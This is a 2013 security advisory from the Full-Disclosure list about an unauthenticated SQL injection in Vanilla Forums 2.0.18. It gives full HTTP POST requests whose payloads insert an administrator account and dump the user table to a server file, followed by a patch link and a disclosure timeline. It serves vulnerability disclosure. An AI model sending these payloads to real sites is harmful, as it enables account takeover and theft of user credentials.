Vanilla Forums 2.0.18 / SQL-Injection / Insert arbitrary user & dump usertable

["Ing. Michael F. Schratt, MSc" <mschratt () mfs-enterprise com>]

Product Name:
        Vanilla Forums

Vulnerable Version:
        Up to vanilla-core-2-0-18-4

Tested on:
        Windows Server 2003
        Apache 2.4.3
        PHP 5.4.7
        MySQL 5.5.27

Vulnerability Overview:
        SQL-Injection is possible, because$_POST arrays are not proper
sanitized.
        You do not need to be authenticated.

 Vulnerability Details:
        To insert an arbitrary user, a sample HTTP-Post Request looks as
follows:

        POST /[PATH]/vanilla/entry/signin HTTP/1.1
        Host: [HOST]
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0)
Gecko/20100101 Firefox/19.0
        Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
        Accept-Encoding: gzip, deflate
        Cookie: [any cookie]
        Connection: keep-alive
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 399

        
Form%2FTransientKey=VQYSOG2F3D38&Form%2Fhpt=&Form%2FTarget=discussions&
        Form%2FClientHour=2013-3-28+11%3A37&Form%2FEmail['admin';INSERT INTO
gdn_user 
        (UserID, Name, Password, HashMethod, DateInserted, Admin,
Permissions)
        VALUES (NULL, '1234', '$P$BayO4QrMb9wgzdjNhlUBWdQcVaMnKN0',
'Vanilla', 
        '2013-03-28 00:00:00', '1',
'');#]=abcd&Form%2FPassword=*&Form%2FSign_In=
        Sign+In&Checkboxes%5B%5D=RememberMe

        Indeed you has to take care of the proper encryption algorithm which
is currently used.
        As it is not possible to get the user table displayed on the
website, you could establish an attack as follows:

        POST /[PATH]/vanilla/entry/passwordrequest HTTP/1.1
        Host: [HOST]
        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0)
Gecko/20100101 Firefox/19.0
        Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: de-de,de;q=0.8,en-us;q=0.5,en;q=0.3
        Accept-Encoding: gzip, deflate
        Connection: keep-alive
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 255

        
Form%2FTransientKey=OJS6EB1J0KW7&Form%2Fhpt=&Form%2FEmail['ac';select * 
        from gdn_user into outfile '[FULL_PATH]\\vanilla\\out.txt' #]=13&
        Form%2FRequest_a_new_password=Request+a+new+password

Update Link:
        
http://vanillaforums.org/discussion/23339/security-update-vanilla-2-0-18-7

Credits:
        This vulnerability was discovered by Michael Schratt
        Mail: mail @ mfs-enterprise . com
        
Web: http://mfs-enterprise.com/wordpress/2013/04/05/vanilla-forums-2-0-18-sq
l-injection-insert-arbitrary-user-dump-usertable/
        Twitter: @bl4ckw0rm

Timeline:
        Mar 28, 2013 – Discovered vulnerability
        Mar 28, 2013 – Contacted vanilla forums and asked for security
contact
        Mar 28, 2013 – Vanilla Forums responded
        Mar 28, 2013 – Transfered vulnerability details
        Apr 02, 2013 – Requested update
        Apr 04, 2013 – Requested update
        Apr 05, 2013 – Patch released
        Apr 05, 2013 – Public advisory released


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/